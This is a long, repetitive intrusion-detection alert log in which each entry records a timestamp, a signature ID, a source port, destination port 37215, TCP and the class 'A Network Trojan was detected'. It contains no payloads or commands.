            Timestamp:05/28/24-09:57:21.880818
            SID:2829579
            Source Port:39806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880854
            SID:2829579
            Source Port:59646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444779
            SID:2829579
            Source Port:45338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.405584
            SID:2829579
            Source Port:51392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.617837
            SID:2835222
            Source Port:34272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760136
            SID:2829579
            Source Port:60586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777550
            SID:2835222
            Source Port:42894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421589
            SID:2829579
            Source Port:38826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.485669
            SID:2835222
            Source Port:52810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.182183
            SID:2829579
            Source Port:33424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611446
            SID:2829579
            Source Port:50308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.752931
            SID:2835222
            Source Port:43818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675590
            SID:2829579
            Source Port:51600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533136
            SID:2829579
            Source Port:60860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753762
            SID:2835222
            Source Port:45416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.636191
            SID:2829579
            Source Port:41864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786583
            SID:2829579
            Source Port:46390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.900055
            SID:2835222
            Source Port:46162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020389
            SID:2829579
            Source Port:47318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856342
            SID:2835222
            Source Port:41228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.854711
            SID:2835222
            Source Port:51726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.679706
            SID:2835222
            Source Port:47886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.851261
            SID:2829579
            Source Port:35354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.552640
            SID:2835222
            Source Port:45896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871119
            SID:2835222
            Source Port:58556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065217
            SID:2829579
            Source Port:45172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424249
            SID:2829579
            Source Port:41056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052377
            SID:2835222
            Source Port:51204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811373
            SID:2829579
            Source Port:50868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.051526
            SID:2835222
            Source Port:45044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.651395
            SID:2835222
            Source Port:46706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290499
            SID:2829579
            Source Port:47908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.912479
            SID:2829579
            Source Port:55138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435410
            SID:2829579
            Source Port:48482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.025845
            SID:2829579
            Source Port:35232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.888759
            SID:2829579
            Source Port:35754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.118694
            SID:2835222
            Source Port:55500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068205
            SID:2835222
            Source Port:55842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764633
            SID:2835222
            Source Port:54016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.454074
            SID:2835222
            Source Port:43130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988102
            SID:2829579
            Source Port:52724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.516008
            SID:2829579
            Source Port:39998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716548
            SID:2829579
            Source Port:45956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.935173
            SID:2835222
            Source Port:59954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779700
            SID:2835222
            Source Port:41466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.517637
            SID:2829579
            Source Port:57588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936316
            SID:2829579
            Source Port:34106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435597
            SID:2829579
            Source Port:53920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840368
            SID:2829579
            Source Port:41388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047891
            SID:2835222
            Source Port:55750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755115
            SID:2829579
            Source Port:49316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969350
            SID:2829579
            Source Port:42002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765669
            SID:2829579
            Source Port:55430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952575
            SID:2835222
            Source Port:51694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.422949
            SID:2829579
            Source Port:40530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.665943
            SID:2835222
            Source Port:60516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691525
            SID:2835222
            Source Port:59814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541538
            SID:2835222
            Source Port:53392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869605
            SID:2829579
            Source Port:35630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920137
            SID:2835222
            Source Port:53380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885515
            SID:2835222
            Source Port:57202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005152
            SID:2829579
            Source Port:57544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437281
            SID:2835222
            Source Port:39282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919773
            SID:2835222
            Source Port:59888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.062076
            SID:2829579
            Source Port:44460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064499
            SID:2835222
            Source Port:39918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892364
            SID:2835222
            Source Port:43116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.741915
            SID:2835222
            Source Port:59052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789483
            SID:2829579
            Source Port:36842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.069482
            SID:2829579
            Source Port:47428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735519
            SID:2835222
            Source Port:60002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065528
            SID:2835222
            Source Port:38556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.275096
            SID:2835222
            Source Port:37062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812224
            SID:2835222
            Source Port:41822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850884
            SID:2829579
            Source Port:59368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.736028
            SID:2835222
            Source Port:48246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923520
            SID:2835222
            Source Port:52772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941994
            SID:2835222
            Source Port:58910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231160
            SID:2835222
            Source Port:45502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811734
            SID:2835222
            Source Port:48384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814270
            SID:2829579
            Source Port:52052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.687390
            SID:2829579
            Source Port:51656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863629
            SID:2835222
            Source Port:40122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046054
            SID:2835222
            Source Port:38124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.295001
            SID:2829579
            Source Port:51372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809899
            SID:2835222
            Source Port:38672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533698
            SID:2829579
            Source Port:40428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954477
            SID:2835222
            Source Port:46462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807745
            SID:2835222
            Source Port:52024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.618357
            SID:2835222
            Source Port:35966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.650738
            SID:2829579
            Source Port:59912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754662
            SID:2829579
            Source Port:34668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038322
            SID:2829579
            Source Port:58350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777870
            SID:2829579
            Source Port:35648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.552203
            SID:2829579
            Source Port:50552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.932016
            SID:2835222
            Source Port:58868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990228
            SID:2835222
            Source Port:36820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.923559
            SID:2835222
            Source Port:53776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943624
            SID:2835222
            Source Port:54414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506863
            SID:2835222
            Source Port:49684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691621
            SID:2829579
            Source Port:47274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737028
            SID:2829579
            Source Port:34682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770702
            SID:2829579
            Source Port:40652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880098
            SID:2835222
            Source Port:48000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993272
            SID:2835222
            Source Port:56068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.380333
            SID:2829579
            Source Port:32996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.187885
            SID:2829579
            Source Port:53356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998278
            SID:2835222
            Source Port:58998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943730
            SID:2835222
            Source Port:41894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507514
            SID:2835222
            Source Port:40216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704326
            SID:2829579
            Source Port:36002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371203
            SID:2829579
            Source Port:43574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031624
            SID:2829579
            Source Port:50102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810769
            SID:2835222
            Source Port:49470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.746760
            SID:2829579
            Source Port:38574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.334919
            SID:2835222
            Source Port:42468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.569312
            SID:2829579
            Source Port:54128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.740952
            SID:2835222
            Source Port:37082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.882076
            SID:2829579
            Source Port:48556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.694347
            SID:2835222
            Source Port:56234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870256
            SID:2835222
            Source Port:47356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.282667
            SID:2829579
            Source Port:50550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.972262
            SID:2835222
            Source Port:56898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276735
            SID:2835222
            Source Port:45260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.997642
            SID:2835222
            Source Port:58768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779137
            SID:2829579
            Source Port:33784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.843630
            SID:2829579
            Source Port:54730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442742
            SID:2835222
            Source Port:33338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.487288
            SID:2829579
            Source Port:38330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730606
            SID:2835222
            Source Port:58196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.938822
            SID:2829579
            Source Port:37832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854249
            SID:2829579
            Source Port:43112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847014
            SID:2829579
            Source Port:43608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542487
            SID:2829579
            Source Port:51936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.439892
            SID:2829579
            Source Port:52472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.788840
            SID:2835222
            Source Port:57264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.516020
            SID:2835222
            Source Port:43594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951236
            SID:2829579
            Source Port:52890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.443203
            SID:2835222
            Source Port:55518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544360
            SID:2829579
            Source Port:55416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956884
            SID:2829579
            Source Port:38238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.034182
            SID:2835222
            Source Port:36670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326536
            SID:2829579
            Source Port:59468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.347719
            SID:2835222
            Source Port:50036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767361
            SID:2829579
            Source Port:38650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861812
            SID:2829579
            Source Port:58184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918517
            SID:2829579
            Source Port:55362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.553062
            SID:2829579
            Source Port:47508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.050816
            SID:2829579
            Source Port:53038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.789092
            SID:2835222
            Source Port:59602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767336
            SID:2829579
            Source Port:37228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280285
            SID:2835222
            Source Port:55562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.938878
            SID:2835222
            Source Port:40878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.731162
            SID:2835222
            Source Port:43864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.738885
            SID:2835222
            Source Port:43300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376831
            SID:2835222
            Source Port:36388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.413021
            SID:2829579
            Source Port:43716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.756672
            SID:2835222
            Source Port:54140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739180
            SID:2835222
            Source Port:55816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790512
            SID:2829579
            Source Port:45964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832379
            SID:2829579
            Source Port:57486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893058
            SID:2829579
            Source Port:48396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333885
            SID:2829579
            Source Port:56520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.282650
            SID:2835222
            Source Port:35562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.815118
            SID:2829579
            Source Port:40230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.742024
            SID:2829579
            Source Port:45992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876150
            SID:2835222
            Source Port:45830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.023621
            SID:2835222
            Source Port:48836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.079179
            SID:2835222
            Source Port:54294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929471
            SID:2829579
            Source Port:39988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.375902
            SID:2835222
            Source Port:36974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754833
            SID:2835222
            Source Port:39742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605284
            SID:2835222
            Source Port:48018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810267
            SID:2835222
            Source Port:42980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996672
            SID:2829579
            Source Port:51830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.444215
            SID:2829579
            Source Port:58542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309663
            SID:2835222
            Source Port:48486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789518
            SID:2829579
            Source Port:39074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778353
            SID:2835222
            Source Port:34384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863898
            SID:2835222
            Source Port:41294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048575
            SID:2829579
            Source Port:36226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926871
            SID:2829579
            Source Port:41372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507621
            SID:2829579
            Source Port:40336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064628
            SID:2829579
            Source Port:44048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967978
            SID:2829579
            Source Port:51590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469825
            SID:2835222
            Source Port:47554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863687
            SID:2829579
            Source Port:50768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064310
            SID:2835222
            Source Port:60010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943282
            SID:2829579
            Source Port:46636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817760
            SID:2829579
            Source Port:44940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.409183
            SID:2835222
            Source Port:60076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.587498
            SID:2835222
            Source Port:57820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.602734
            SID:2829579
            Source Port:44316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469432
            SID:2835222
            Source Port:56218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.702742
            SID:2829579
            Source Port:44692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027085
            SID:2829579
            Source Port:53006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.802085
            SID:2835222
            Source Port:45820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.821400
